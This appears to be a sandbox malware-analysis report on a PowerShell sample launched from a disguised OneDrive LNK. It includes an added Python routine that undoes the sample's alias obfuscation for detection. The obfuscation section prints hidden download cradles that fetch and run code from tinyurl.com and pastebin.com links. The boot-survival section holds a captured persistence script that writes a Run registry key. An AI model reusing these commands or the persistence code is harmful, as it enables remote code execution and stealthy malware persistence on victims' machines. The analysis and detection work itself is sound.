Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\forfiles.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync lnk.lnkLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: BeginSync.lnk.4.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFEF00BD pushad ; iretd | 4_2_00007FF7BFEF00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFF027E0 push FFFFFFE8h; retf | 4_2_00007FF7BFF02AF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFF01EE7 push ebx; ret | 4_2_00007FF7BFF01EEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFFC59EE push ds; retf | 4_2_00007FF7BFFC5A0F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFFCCB94 push ecx; retf 0000h | 4_2_00007FF7BFFCCB95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFFCCB9C push ecx; retf 0000h | 4_2_00007FF7BFFCCB9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF7BFFCC8F2 pushad ; retf | 4_2_00007FF7BFFCC8F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFED00BD pushad ; iretd | 11_2_00007FF7BFED00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEE785E push eax; iretd | 11_2_00007FF7BFEE786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFEE782E pushad ; iretd | 11_2_00007FF7BFEE785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFFA7AEB push ebp; iretd | 11_2_00007FF7BFFA7AEC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF7BFFA6DC3 push edi; iretd | 11_2_00007FF7BFFA6DC6
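The command lines in this section hide a plain download cradle behind three Set-Alias (sal) calls: sal callit iEx makes callit an alias of Invoke-Expression, and sal $env:os iWr names an alias after the value of $env:OS, which is Windows_NT on every Windows host, so the final statement calliT(WINDOWS_NT <url> -usebasicparsing) is iex (iwr <url> -UseBasicParsing). The fatbake alias for calc is never used. The Python below is an added worked example, not code from the report or from the sample: it resolves that indirection statically so a detection pipeline can match on the real cmdlet names and pull out the fetched URL. It assumes only the sal form the sample uses, treats $env:OS as Windows_NT, and takes the inner single-quoted script from the nested -command launch; it is not a PowerShell parser.

```python
"""Statically undo the Set-Alias (sal) indirection in a PowerShell one-liner.

Added example, not part of the sandbox report or of the sample. It models
only what the sample uses: `sal <name> <target>` statements, a `$env:NAME`
alias name, and the built-in iex/iwr aliases. It is not a PowerShell parser.
"""
import re

# Default PowerShell aliases the sample relies on (real built-ins).
BUILTIN_ALIASES = {"iex": "Invoke-Expression", "iwr": "Invoke-WebRequest"}

# $env:OS is "Windows_NT" on every Windows host. The sample uses it as an
# alias *name*, so the bare word WINDOWS_NT in the call is Invoke-WebRequest.
# Assumed environment table; only OS is needed for this sample.
ENVIRONMENT = {"os": "Windows_NT"}

SAL_RE = re.compile(r"^sal\s+(\S+)\s+(\S+)$", re.I)
ENV_RE = re.compile(r"^\$env:(\w+)$", re.I)
URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}(?:/[\w./-]*)?", re.I)
INNER_RE = re.compile(r"-command\s+'([^']*)'", re.I)

# Inner command line as reported above (forfiles -> powershell -> powershell).
SAMPLE_CMDLINE = ("-command powershell -windowstyle h -command 'sal fatbake calc;"
                  "sal callit iEx; sal $env:os iWr; "
                  "calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'")


def inner_script(cmdline):
    """Pull the single-quoted script out of a nested `-command '...'` launch."""
    m = INNER_RE.search(cmdline)
    return m.group(1) if m else cmdline


def expand_env(token):
    """Replace a $env:NAME token with its value; other tokens pass through."""
    m = ENV_RE.match(token)
    return ENVIRONMENT.get(m.group(1).lower(), token) if m else token


def resolve_aliases(script):
    """Return (alias_map, rewritten_script).

    alias_map maps each lower-cased alias name to the command it stands for;
    rewritten_script is the non-sal statements with every alias, including the
    built-in iex/iwr, replaced by its full cmdlet name. PowerShell command
    names are case-insensitive, so the substitution is too.
    """
    aliases, remaining = {}, []
    for stmt in (s.strip() for s in script.split(";") if s.strip()):
        m = SAL_RE.match(stmt)
        if m:
            name = expand_env(m.group(1)).lower()
            target = m.group(2)
            aliases[name] = BUILTIN_ALIASES.get(target.lower(), target)
        else:
            remaining.append(stmt)
    rewritten = "; ".join(remaining)
    # User-defined aliases first, then the built-ins they may have pointed at.
    for name, target in list(aliases.items()) + list(BUILTIN_ALIASES.items()):
        rewritten = re.sub(r"\b%s\b" % re.escape(name), target, rewritten, flags=re.I)
    return aliases, rewritten


def download_cradle_urls(rewritten):
    """URLs whose fetched body is executed (Invoke-Expression over Invoke-WebRequest).

    Returns [] when the script is not an iex(iwr ...) cradle.
    """
    if "invoke-expression" not in rewritten.lower():
        return []
    urls = []
    for m in re.finditer(r"Invoke-WebRequest\s+(\S+)", rewritten):
        u = URL_RE.match(m.group(1))
        if u:
            urls.append(u.group(0))
    return urls


if __name__ == "__main__":
    aliases, plain = resolve_aliases(inner_script(SAMPLE_CMDLINE))
    print(aliases)
    print(plain)
    print(download_cradle_urls(plain))
```

Matching on the rewritten form rather than the raw command line is the point: a rule keyed on the literal string "iex" or "Invoke-WebRequest" never fires on this sample, while one keyed on the resolved cradle does for both the tinyurl.com and the pastebin.com variants.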

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (12 identical events)

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface (script buffer; the capture starts and ends mid-script, and the same buffer was reported three times):
.lnk" -Force
sleep 5
$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
if (-Not (Test-Path $googoogaagaa)) {
rm $env:tmp\onedrivefilesync.dll -force
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force
mkdir "C:\ProgramData\Microsoft OneDrive\FileSync";
$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,